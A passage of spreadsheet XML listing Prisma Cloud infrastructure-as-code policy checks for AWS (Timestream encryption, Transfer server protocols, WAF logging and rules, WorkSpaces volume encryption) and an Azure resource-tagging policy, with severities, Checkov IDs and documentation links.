          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC852" t="inlineStr">
        <is>
          <t>CKV_AWS_337</t>
        </is>
      </c>
      <c r="AD852" t="b">
        <v>1</v>
      </c>
      <c r="AE852" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF852" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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2" t="inlineStr">
        <is>
          <t>ddacd807-8ebd-4c4e-896a-05e3eb45133d</t>
        </is>
      </c>
      <c r="AI852" t="inlineStr"/>
      <c r="AJ852" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK852" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" t="inlineStr"/>
      <c r="B853" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C853" s="2" t="inlineStr"/>
      <c r="D853" t="inlineStr"/>
      <c r="E853" t="inlineStr"/>
      <c r="F853" t="inlineStr"/>
      <c r="G853" t="b">
        <v>1</v>
      </c>
      <c r="H8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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J853" t="inlineStr">
        <is>
          <t>IaC:General:aws-timestreamwrite</t>
        </is>
      </c>
      <c r="K853" t="inlineStr">
        <is>
          <t>Timestream database is not encrypted with KMS CMK</t>
        </is>
      </c>
      <c r="L853" t="inlineStr"/>
      <c r="M853" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N853" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O853" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P853" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q853" t="inlineStr"/>
      <c r="R853" t="inlineStr"/>
      <c r="S853" t="inlineStr"/>
      <c r="T853" t="b">
        <v>0</v>
      </c>
      <c r="U853" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V853" t="inlineStr">
        <is>
          <t>IaC:General:aws-timestreamwrite-database</t>
        </is>
      </c>
      <c r="W853" t="inlineStr">
        <is>
          <t>Ensure that Timestream database is encrypted with KMS CMK</t>
        </is>
      </c>
      <c r="X853" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-timestream-database-is-encrypted-with-kms-cmk</t>
        </is>
      </c>
      <c r="Y853" t="inlineStr"/>
      <c r="Z853" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_timestreamwrite_database"]}</t>
        </is>
      </c>
      <c r="AA853" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB853" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC853" t="inlineStr">
        <is>
          <t>CKV_AWS_160</t>
        </is>
      </c>
      <c r="AD853" t="b">
        <v>1</v>
      </c>
      <c r="AE853" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF853" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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3" t="inlineStr">
        <is>
          <t>35a66930-d50f-4d1c-abe4-09b90e80844a</t>
        </is>
      </c>
      <c r="AI853" t="inlineStr"/>
      <c r="AJ853" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK853" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" t="inlineStr"/>
      <c r="B854" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C854" s="2" t="inlineStr"/>
      <c r="D854" t="inlineStr"/>
      <c r="E854" t="inlineStr"/>
      <c r="F854" t="inlineStr"/>
      <c r="G854" t="b">
        <v>1</v>
      </c>
      <c r="H8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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J854" t="inlineStr">
        <is>
          <t>IaC:General:aws-transfer</t>
        </is>
      </c>
      <c r="K854" t="inlineStr">
        <is>
          <t>Transfer server does not force secure protocols.</t>
        </is>
      </c>
      <c r="L854" t="inlineStr"/>
      <c r="M854" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N854" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O854" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P854" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q854" t="inlineStr"/>
      <c r="R854" t="inlineStr"/>
      <c r="S854" t="inlineStr"/>
      <c r="T854" t="b">
        <v>0</v>
      </c>
      <c r="U854" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V854" t="inlineStr">
        <is>
          <t>IaC:General:aws-transfer-server</t>
        </is>
      </c>
      <c r="W854" t="inlineStr">
        <is>
          <t>Ensure Transfer Server allows only secure protocols</t>
        </is>
      </c>
      <c r="X854" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-357</t>
        </is>
      </c>
      <c r="Y854" t="inlineStr"/>
      <c r="Z854" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_transfer_server"]}</t>
        </is>
      </c>
      <c r="AA854" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB854" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC854" t="inlineStr">
        <is>
          <t>CKV_AWS_357</t>
        </is>
      </c>
      <c r="AD854" t="b">
        <v>1</v>
      </c>
      <c r="AE854" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF854" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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4" t="inlineStr">
        <is>
          <t>0d78b561-423d-455a-adb7-c33891490da2</t>
        </is>
      </c>
      <c r="AI854" t="inlineStr"/>
      <c r="AJ854" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK854" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" t="inlineStr"/>
      <c r="B855" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C855" s="2" t="inlineStr"/>
      <c r="D855" t="inlineStr"/>
      <c r="E855" t="inlineStr"/>
      <c r="F855" t="inlineStr"/>
      <c r="G855" t="b">
        <v>1</v>
      </c>
      <c r="H8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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J855" t="inlineStr">
        <is>
          <t>IaC:General:aws-waf</t>
        </is>
      </c>
      <c r="K855" t="inlineStr">
        <is>
          <t>AWS WAF Web Access Control Lists logging is disabled</t>
        </is>
      </c>
      <c r="L855" t="inlineStr"/>
      <c r="M855" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N855" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O855" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P855" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q855" t="inlineStr"/>
      <c r="R855" t="inlineStr"/>
      <c r="S855" t="inlineStr"/>
      <c r="T855" t="b">
        <v>0</v>
      </c>
      <c r="U855" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V855" t="inlineStr">
        <is>
          <t>IaC:General:aws-waf-web-acl,aws-wafregional-web-acl</t>
        </is>
      </c>
      <c r="W855" t="inlineStr">
        <is>
          <t>Ensure Logging is enabled for WAF  Web Access Control Lists</t>
        </is>
      </c>
      <c r="X855" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-31</t>
        </is>
      </c>
      <c r="Y855" t="inlineStr"/>
      <c r="Z855" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_waf_web_acl","aws_wafregional_web_acl"]}</t>
        </is>
      </c>
      <c r="AA855" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB855" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC855" t="inlineStr">
        <is>
          <t>CKV_AWS_176</t>
        </is>
      </c>
      <c r="AD855" t="b">
        <v>1</v>
      </c>
      <c r="AE855" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF855" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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5" t="inlineStr">
        <is>
          <t>6107761b-b8c4-4c2c-9418-e264f5dc11e6</t>
        </is>
      </c>
      <c r="AI855" t="inlineStr"/>
      <c r="AJ855" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK855" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" t="inlineStr"/>
      <c r="B856" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C856" s="2" t="inlineStr"/>
      <c r="D856" t="inlineStr"/>
      <c r="E856" t="inlineStr"/>
      <c r="F856" t="inlineStr"/>
      <c r="G856" t="b">
        <v>1</v>
      </c>
      <c r="H8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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J856" t="inlineStr">
        <is>
          <t>IaC:General:aws-waf</t>
        </is>
      </c>
      <c r="K856" t="inlineStr">
        <is>
          <t>AWS WAF does not have associated rules</t>
        </is>
      </c>
      <c r="L856" t="inlineStr"/>
      <c r="M856" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N856" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O856" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P856" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q856" t="inlineStr"/>
      <c r="R856" t="inlineStr"/>
      <c r="S856" t="inlineStr"/>
      <c r="T856" t="b">
        <v>0</v>
      </c>
      <c r="U856" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V856" t="inlineStr">
        <is>
          <t>IaC:General:aws-waf-web-acl,aws-wafregional-web-acl,aws-wafv2-web-acl</t>
        </is>
      </c>
      <c r="W856" t="inlineStr">
        <is>
          <t>Ensure WAF has associated rules</t>
        </is>
      </c>
      <c r="X856" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-64</t>
        </is>
      </c>
      <c r="Y856" t="inlineStr"/>
      <c r="Z856" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_waf_web_acl","aws_wafregional_web_acl","aws_wafv2_web_acl"]}</t>
        </is>
      </c>
      <c r="AA856" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB856" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC856" t="inlineStr">
        <is>
          <t>CKV_AWS_175</t>
        </is>
      </c>
      <c r="AD856" t="b">
        <v>1</v>
      </c>
      <c r="AE856" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF856" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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6" t="inlineStr">
        <is>
          <t>c6f2d03c-d2fd-491d-9a29-f555709a47ae</t>
        </is>
      </c>
      <c r="AI856" t="inlineStr"/>
      <c r="AJ856" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK856" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" t="inlineStr"/>
      <c r="B857" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C857" s="2" t="inlineStr"/>
      <c r="D857" t="inlineStr"/>
      <c r="E857" t="inlineStr"/>
      <c r="F857" t="inlineStr"/>
      <c r="G857" t="b">
        <v>1</v>
      </c>
      <c r="H8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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J857" t="inlineStr">
        <is>
          <t>IaC:General:aws-waf</t>
        </is>
      </c>
      <c r="K857" t="inlineStr">
        <is>
          <t>WAF rule does not have any actions</t>
        </is>
      </c>
      <c r="L857" t="inlineStr"/>
      <c r="M857" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N857" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O857" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P857" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q857" t="inlineStr"/>
      <c r="R857" t="inlineStr"/>
      <c r="S857" t="inlineStr"/>
      <c r="T857" t="b">
        <v>0</v>
      </c>
      <c r="U857" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V857" t="inlineStr">
        <is>
          <t>IaC:General:aws-waf-web-acl,aws-wafregional-web-acl,aws-wafv2-web-acl,aws-wafv2-rule-group,aws-wafregional-rule-group,aws-waf-rule-group</t>
        </is>
      </c>
      <c r="W857" t="inlineStr">
        <is>
          <t>Ensure WAF rule has any actions</t>
        </is>
      </c>
      <c r="X857" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-342</t>
        </is>
      </c>
      <c r="Y857" t="inlineStr"/>
      <c r="Z857" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_waf_web_acl","aws_wafregional_web_acl","aws_wafv2_web_acl","aws_wafv2_rule_group","aws_wafregional_rule_group","aws_waf_rule_group"]}</t>
        </is>
      </c>
      <c r="AA857" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB857" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC857" t="inlineStr">
        <is>
          <t>CKV_AWS_342</t>
        </is>
      </c>
      <c r="AD857" t="b">
        <v>1</v>
      </c>
      <c r="AE857" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF857" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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7" t="inlineStr">
        <is>
          <t>4ee02b8b-632f-4db6-bebd-4e605859d1fa</t>
        </is>
      </c>
      <c r="AI857" t="inlineStr"/>
      <c r="AJ857" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK857" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" t="inlineStr"/>
      <c r="B858" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C858" s="2" t="inlineStr"/>
      <c r="D858" t="inlineStr"/>
      <c r="E858" t="inlineStr"/>
      <c r="F858" t="inlineStr"/>
      <c r="G858" t="b">
        <v>1</v>
      </c>
      <c r="H8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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J858" t="inlineStr">
        <is>
          <t>IaC:General:aws-wafv2</t>
        </is>
      </c>
      <c r="K858" t="inlineStr">
        <is>
          <t>AWS WAF2 does not have a Logging Configuration</t>
        </is>
      </c>
      <c r="L858" t="inlineStr"/>
      <c r="M858" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N858" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O858" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P858" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q858" t="inlineStr"/>
      <c r="R858" t="inlineStr"/>
      <c r="S858" t="inlineStr"/>
      <c r="T858" t="b">
        <v>0</v>
      </c>
      <c r="U858" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V858" t="inlineStr">
        <is>
          <t>IaC:General:aws-wafv2-web-acl</t>
        </is>
      </c>
      <c r="W858" t="inlineStr">
        <is>
          <t>Ensure WAF2 has a Logging Configuration</t>
        </is>
      </c>
      <c r="X858" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-33</t>
        </is>
      </c>
      <c r="Y858" t="inlineStr"/>
      <c r="Z858" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_wafv2_web_acl"]}</t>
        </is>
      </c>
      <c r="AA858" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB858" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC858" t="inlineStr">
        <is>
          <t>CKV2_AWS_31</t>
        </is>
      </c>
      <c r="AD858" t="b">
        <v>1</v>
      </c>
      <c r="AE858" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF858" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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8" t="inlineStr">
        <is>
          <t>2ab53e6b-4272-43a8-ba6a-cc30add35ca9</t>
        </is>
      </c>
      <c r="AI858" t="inlineStr"/>
      <c r="AJ858" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK858" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" t="inlineStr"/>
      <c r="B859" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C859" s="2" t="inlineStr"/>
      <c r="D859" t="inlineStr"/>
      <c r="E859" t="inlineStr"/>
      <c r="F859" t="inlineStr"/>
      <c r="G859" t="b">
        <v>1</v>
      </c>
      <c r="H8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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J859" t="inlineStr">
        <is>
          <t>IaC:General:aws-workspaces</t>
        </is>
      </c>
      <c r="K859" t="inlineStr">
        <is>
          <t>Workspace root volumes are not encrypted</t>
        </is>
      </c>
      <c r="L859" t="inlineStr"/>
      <c r="M859" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N859" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O859" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P859" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q859" t="inlineStr"/>
      <c r="R859" t="inlineStr"/>
      <c r="S859" t="inlineStr"/>
      <c r="T859" t="b">
        <v>0</v>
      </c>
      <c r="U859" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V859" t="inlineStr">
        <is>
          <t>IaC:General:aws-workspaces-workspace</t>
        </is>
      </c>
      <c r="W859" t="inlineStr">
        <is>
          <t>Ensure that Workspace root volumes are encrypted</t>
        </is>
      </c>
      <c r="X859" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-workspace-root-volumes-are-encrypted</t>
        </is>
      </c>
      <c r="Y859" t="inlineStr"/>
      <c r="Z859" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_workspaces_workspace"]}</t>
        </is>
      </c>
      <c r="AA859" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB859" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC859" t="inlineStr">
        <is>
          <t>CKV_AWS_156</t>
        </is>
      </c>
      <c r="AD859" t="b">
        <v>1</v>
      </c>
      <c r="AE859" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF859" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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59" t="inlineStr">
        <is>
          <t>4fa5c837-9ad3-4444-a3f0-2a0224fc6491</t>
        </is>
      </c>
      <c r="AI859" t="inlineStr"/>
      <c r="AJ859" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK859" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" t="inlineStr"/>
      <c r="B860" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C860" s="2" t="inlineStr"/>
      <c r="D860" t="inlineStr"/>
      <c r="E860" t="inlineStr"/>
      <c r="F860" t="inlineStr"/>
      <c r="G860" t="b">
        <v>1</v>
      </c>
      <c r="H8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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J860" t="inlineStr">
        <is>
          <t>IaC:General:aws-workspaces</t>
        </is>
      </c>
      <c r="K860" t="inlineStr">
        <is>
          <t>Workspace user volumes are not encrypted</t>
        </is>
      </c>
      <c r="L860" t="inlineStr"/>
      <c r="M860" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N860" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O860" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P860" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q860" t="inlineStr"/>
      <c r="R860" t="inlineStr"/>
      <c r="S860" t="inlineStr"/>
      <c r="T860" t="b">
        <v>0</v>
      </c>
      <c r="U860" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V860" t="inlineStr">
        <is>
          <t>IaC:General:aws-workspaces-workspace</t>
        </is>
      </c>
      <c r="W860" t="inlineStr">
        <is>
          <t>Ensure that Workspace user volumes are encrypted</t>
        </is>
      </c>
      <c r="X860" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-workspace-user-volumes-are-encrypted</t>
        </is>
      </c>
      <c r="Y860" t="inlineStr"/>
      <c r="Z860" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_workspaces_workspace"]}</t>
        </is>
      </c>
      <c r="AA860" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB860" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC860" t="inlineStr">
        <is>
          <t>CKV_AWS_155</t>
        </is>
      </c>
      <c r="AD860" t="b">
        <v>1</v>
      </c>
      <c r="AE860" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF860" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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0" t="inlineStr">
        <is>
          <t>49aadf6f-fff8-4b93-afe7-14fb0e8e1c51</t>
        </is>
      </c>
      <c r="AI860" t="inlineStr"/>
      <c r="AJ860" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK860" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" t="inlineStr"/>
      <c r="B861" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C861" s="2" t="inlineStr"/>
      <c r="D861" t="inlineStr"/>
      <c r="E861" t="inlineStr"/>
      <c r="F861" t="inlineStr"/>
      <c r="G861" t="b">
        <v>1</v>
      </c>
      <c r="H8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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J861" t="inlineStr">
        <is>
          <t>IaC:General:azure-analysis</t>
        </is>
      </c>
      <c r="K861" t="inlineStr">
        <is>
          <t>Azure resources that support tags do not have tags</t>
        </is>
      </c>
      <c r="L861" t="inlineStr"/>
      <c r="M861" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N861" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O861" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P861" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q861" t="inlineStr"/>
      <c r="R861" t="inlineStr"/>
      <c r="S861" t="inlineStr"/>
      <c r="T861" t="b">
        <v>0</v>
      </c>
      <c r="U861" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V861" t="inlineStr">
        <is>
          <t>IaC:General:azure-analysis-services-server,azure-api-management,azure-api-management-named-value,azure-api-management-property,azure-app-configuration,azure-app-service,azure-app-service-certificate,azure-app-service-certificate-order,azure-app-service-environment,azure-app-service-managed-certificate,azure-app-service-plan,azure-app-service-slot,azure-application-gateway,azure-application-insights,azure-application-insights-web-test,azure-application-security-group,azure-attestation-provider,azure-automation-account,azure-automation-dsc-configuration,azure-automation-runbook,azure-availability-set,azure-backup-policy-vm,azure-backup-protected-vm,azure-bastion-host,azure-batch-account,azure-bot-channels-registration,azure-bot-connection,azure-bot-web-app,azure-cdn-endpoint,azure-cdn-profile,azure-cognitive-account,azure-communication-service,azure-container-group,azure-container-registry,azure-container-registry-webhook,azure-cosmosdb-account,azure-custom-provider,azure-dashboard,azure-data-factory,azure-data-factory-linked-service-azure-databricks,azure-data-lake-analytics-account,azure-data-lake-store,azure-data-share-account,azure-database-migration-project,azure-database-migration-service,azure-databox-edge-device,azure-databricks-workspace,azure-dedicated-hardware-security-module,azure-dedicated-host,azure-dedicated-host-group,azure-dev-test-global-vm-shutdown-schedule,azure-dev-test-lab,azure-dev-test-linux-virtual-machine,azure-dev-test-policy,azure-dev-test-schedule,azure-dev-test-virtual-network,azure-dev-test-windows-virtual-machine,azure-devspace-controller,azure-digital-twins-instance,azure-disk-access,azure-disk-encryption-set,azure-dns-a-record,azure-dns-aaaa-record,azure-dns-caa-record,azure-dns-cname-record,azure-dns-mx-record,azure-dns-ns-record,azure-dns-ptr-record,azure-dns-srv-record,azure-dns-txt-record,azure-dns-zone,azure-eventgrid-domain,azure-eventgrid-system-topic,azure-eventgrid-topic,azure-eventhub-cluster,azure-eventhub-namespace,azure-express-route-circuit,azure-express-route-gateway,azure-express-route-port,azure-firewall,azure-firewall-policy,azure-frontdoor,azure-frontdoor-firewall-policy,azure-function-app,azure-function-app-slot,azure-hdinsight-hadoop-cluster,azure-hdinsight-hbase-cluster,azure-hdinsight-interactive-query-cluster,azure-hdinsight-kafka-cluster,azure-hdinsight-ml-services-cluster,azure-hdinsight-rserver-cluster,azure-hdinsight-spark-cluster,azure-hdinsight-storm-cluster,azure-healthcare-service,azure-hpc-cache,azure-image,azure-integration-service-environment,azure-iot-security-solution,azure-iot-time-series-insights-gen2-environment,azure-iot-time-series-insights-reference-data-set,azure-iot-time-series-insights-standard-environment,azure-iotcentral-application,azure-iothub,azure-iothub-dps,azure-ip-group,azure-key-vault,azure-key-vault-certificate,azure-key-vault-key,azure-key-vault-secret,azure-kubernetes-cluster,azure-kubernetes-cluster-node-pool,azure-kusto-cluster,azure-lb,azure-linux-virtual-machine,azure-linux-virtual-machine-scale-set,azure-local-network-gateway,azure-log-analytics-cluster,azure-log-analytics-linked-service,azure-log-analytics-saved-search,azure-log-analytics-solution,azure-log-analytics-storage-insights,azure-log-analytics-workspace,azure-logic-app-integration-account,azure-logic-app-workflow,azure-machine-learning-workspace,azure-maintenance-configuration,azure-managed-application,azure-managed-application-definition,azure-managed-disk,azure-management-group-template-deployment,azure-maps-account,azure-mariadb-server,azure-media-live-event,azure-media-services-account,azure-media-streaming-endpoint,azure-monitor-action-group,azure-monitor-action-rule-action-group,azure-monitor-action-rule-suppression,azure-monitor-activity-log-alert,azure-monitor-autoscale-setting,azure-monitor-metric-alert,azure-monitor-scheduled-query-rules-alert,azure-monitor-scheduled-query-rules-log,azure-monitor-smart-detector-alert-rule,azure-mssql-database,azure-mssql-elasticpool,azure-mssql-server,azure-mssql-virtual-machine,azure-mysql-server,azure-nat-gateway,azure-netapp-account,azure-netapp-pool,azure-netapp-snapshot,azure-netapp-volume,azure-network-connection-monitor,azure-network-ddos-protection-plan,azure-network-interface,azure-network-profile,azure-network-security-group,azure-network-watcher,azure-notification-hub,azure-notification-hub-namespace,azure-orchestrated-virtual-machine-scale-set,azure-point-to-site-vpn-gateway,azure-postgresql-server,azure-powerbi-embedded,azure-private-dns-a-record,azure-private-dns-aaaa-record,azure-private-dns-cname-record,azure-private-dns-mx-record,azure-private-dns-ptr-record,azure-private-dns-srv-record,azure-private-dns-txt-record,azure-private-dns-zone,azure-private-dns-zone-virtual-network-link,azure-private-endpoint,azure-private-link-service,azure-proximity-placement-group,azure-public-ip,azure-public-ip-prefix,azure-purview-account,azure-recovery-services-vault,azure-redis-cache,azure-redis-enterprise-cluster,azure-relay-namespace,azure-resource-group,azure-resource-group-template-deployment,azure-route-filter,azure-route-table,azure-search-service,azure-security-center-automation,azure-service-fabric-cluster,azure-service-fabric-mesh-application,azure-service-fabric-mesh-l